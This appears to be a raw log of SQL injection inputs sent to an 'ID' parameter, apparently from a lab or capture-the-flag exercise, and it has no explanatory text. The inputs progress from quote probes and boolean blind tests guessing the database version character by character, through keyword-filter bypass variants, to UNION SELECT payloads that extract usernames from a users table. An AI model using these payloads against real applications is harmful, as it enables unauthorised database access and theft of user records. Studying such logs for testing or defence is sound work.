ID:1'
ID:1'
ID:1'
ID:1'
ID:1'=(left((seLect(group_concat(@@version))),1)='a'='1
ID:1'=(left((seLect(group_concat(@@version))),1)='o')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='o')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=12#
ID:1' and 1=2 #
ID:1' and 1=2 #
ID:1' and 1=2 #
ID:1' and 1=2 #
ID:1' and 1=2 #
ID:1') and 1=1 #
ID:1') and 1=1 #
ID:1') and 1=2 #
ID:1') union seLect 1,2,3  #
ID:1') union seLect 1,2,3  #
ID:1') union seLect 1,2,3  #
ID:1') union sseLect 1,2,3  #
ID:1') union selectseLect 1,2,3  #
ID:1') union selectseLect 1,2,3  #
ID:1') union select union seLect 1,2,3  #
ID:1') union SeLect 1,2,3  #
ID:1') unIon SeLect 1,2,3  #
ID:1') unIon SeLect 1,2,3  #
ID:1') unIOn SeLect 1,2,3  #
ID:1') unIOn(SeLect 1,2,3)  #
ID:1') union(select 1,2,3)  #
ID:1') union(select 1,2,group_concat(username) from users)  #
ID:1') union(select 1,2,group_concat(username) from users)  #
ID:1') union(select 1,2,(group_concat(username) from users))  #
ID:1') union(select 1,2,(group_concat(username) from users))  #
ID:1') union(select 1,2,(group_concat(username) from users))  #
ID:1') union(select 1,2,(group_concat(username) from users))  #
ID:1') union(select 1,2,(group_concat(username) from users))  #
ID:1') union(select 1,2,group_concat(username) from users)  #
ID:1') union(select 1,2,group_concat(username) from users)  #
ID:1') union(select 1,2,group_concat(username) from users)  #
ID:-1') union(select 1,2,group_concat(username) from users)  #
